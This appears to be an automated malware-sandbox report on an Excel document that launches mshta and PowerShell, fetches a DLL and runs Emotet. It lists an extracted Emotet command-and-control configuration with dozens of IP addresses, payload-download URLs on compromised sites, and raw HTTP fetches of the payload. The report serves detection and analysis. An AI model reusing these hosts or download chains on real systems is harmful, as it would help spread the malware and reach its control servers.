                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/Avira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.htmlAvira URL Cloud: Label: malware
                            Found malware configuration
                            Source: 12.2.rundll32.exe.1b0000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                            Multi AV Scanner detection for submitted file
                            Source: CJ68000754184.xlsVirustotal: Detection: 13%Perma Link
                            Source: CJ68000754184.xlsReversingLabs: Detection: 18%
                            Multi AV Scanner detection for domain / URL
                            Source: hostfeeling.comVirustotal: Detection: 10%Perma Link
                            Machine Learning detection for dropped file
                            Source: C:\ProgramData\JooSee.dllJoe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,12_2_10021854

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
                            Source: global trafficDNS query: name: hostfeeling.com
                            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                            Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorIPs: 160.16.102.168:80
                            Source: Malware configuration extractorIPs: 131.100.24.231:80
                            Source: Malware configuration extractorIPs: 200.17.134.35:7080
                            Source: Malware configuration extractorIPs: 207.38.84.195:8080
                            Source: Malware configuration extractorIPs: 212.237.56.116:7080
                            Source: Malware configuration extractorIPs: 58.227.42.236:80
                            Source: Malware configuration extractorIPs: 104.251.214.46:8080
                            Source: Malware configuration extractorIPs: 158.69.222.101:443
                            Source: Malware configuration extractorIPs: 192.254.71.210:443
                            Source: Malware configuration extractorIPs: 46.55.222.11:443
                            Source: Malware configuration extractorIPs: 45.118.135.203:7080
                            Source: Malware configuration extractorIPs: 107.182.225.142:8080
                            Source: Malware configuration extractorIPs: 103.75.201.2:443
                            Source: Malware configuration extractorIPs: 104.168.155.129:8080
                            Source: Malware configuration extractorIPs: 195.154.133.20:443
                            Source: Malware configuration extractorIPs: 159.8.59.82:8080
                            Source: Malware configuration extractorIPs: 110.232.117.186:8080
                            Source: Malware configuration extractorIPs: 45.142.114.231:8080
                            Source: Malware configuration extractorIPs: 41.76.108.46:8080
                            Source: Malware configuration extractorIPs: 203.114.109.124:443
                            Source: Malware configuration extractorIPs: 50.116.54.215:443
                            Source: Malware configuration extractorIPs: 209.59.138.75:7080
                            Source: Malware configuration extractorIPs: 185.157.82.211:8080
                            Source: Malware configuration extractorIPs: 164.68.99.3:8080
                            Source: Malware configuration extractorIPs: 162.214.50.39:7080
                            Source: Malware configuration extractorIPs: 138.185.72.26:8080
                            Source: Malware configuration extractorIPs: 178.63.25.185:443
                            Source: Malware configuration extractorIPs: 51.15.4.22:443
                            Source: Malware configuration extractorIPs: 81.0.236.90:443
                            Source: Malware configuration extractorIPs: 216.158.226.206:443
                            Source: Malware configuration extractorIPs: 45.176.232.124:443
                            Source: Malware configuration extractorIPs: 162.243.175.63:443
                            Source: Malware configuration extractorIPs: 212.237.17.99:8080
                            Source: Malware configuration extractorIPs: 45.118.115.99:8080
                            Source: Malware configuration extractorIPs: 129.232.188.93:443
                            Source: Malware configuration extractorIPs: 173.214.173.220:8080
                            Source: Malware configuration extractorIPs: 178.79.147.66:8080
                            Source: Malware configuration extractorIPs: 176.104.106.96:8080
                            Source: Malware configuration extractorIPs: 51.38.71.0:443
                            Source: Malware configuration extractorIPs: 173.212.193.249:8080
                            Source: Malware configuration extractorIPs: 217.182.143.207:443
                            Source: Malware configuration extractorIPs: 212.24.98.99:8080
                            Source: Malware configuration extractorIPs: 159.89.230.105:443
                            Source: Malware configuration extractorIPs: 79.172.212.216:8080
                            Source: Malware configuration extractorIPs: 212.237.5.209:443
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:18:49 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:18:49 GMTExpires: Fri, 28 Jan 2022 20:18:49 GMTContent-Disposition: attachment; filename="KfCx9N.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 21
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.11
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172
                            Source: mshta.exe, 00000004.00000002.445696631.0000000000396000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441775503.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html
                            Source: CJ68000754184.xls.0.drString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
                            Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
                            Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.html_
                            Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlb
                            Source: mshta.exe, 00000004.00000003.420330399.00000000002E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmld
                            Source: mshta.exe, 00000004.00000003.423260829.00000000032DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
                            Source: mshta.exe, 00000004.00000003.422456833.00000000032D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
                            Source: mshta.exe, 00000004.00000002.446063365.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmll
                            Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
                            Source: mshta.exe, 00000004.00000002.445509209.00000000002BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443936246.00000000002B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.p
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.png
                            Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-adm
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.suk
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-cont
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
                            Source: powershell.exe, 00000006.00000002.685196853.00000000037CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/asset
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/f
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
                            Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                            Source: powershell.exe, 00000006.00000002.677314579.0000000000260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://w
                            Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                            Source: mshta.exe, 00000004.00000003.420738023.0000000003A2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com
                            Source: mshta.exe, 00000004.00000002.446348661.0000000003CAA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/
                            Source: mshta.exe, 00000004.00000003.441443397.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420217264.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446302477.0000000003AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/ll
                            Source: mshta.exe, 00000004.00000003.441588224.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446294886.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420167396.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443804667.0000000003A9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.com/r
                            Source: mshta.exe, 00000004.00000003.420287820.0000000003A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.protware.comP
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/9
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/
                            Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: hostfeeling.com
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,12_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 10.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
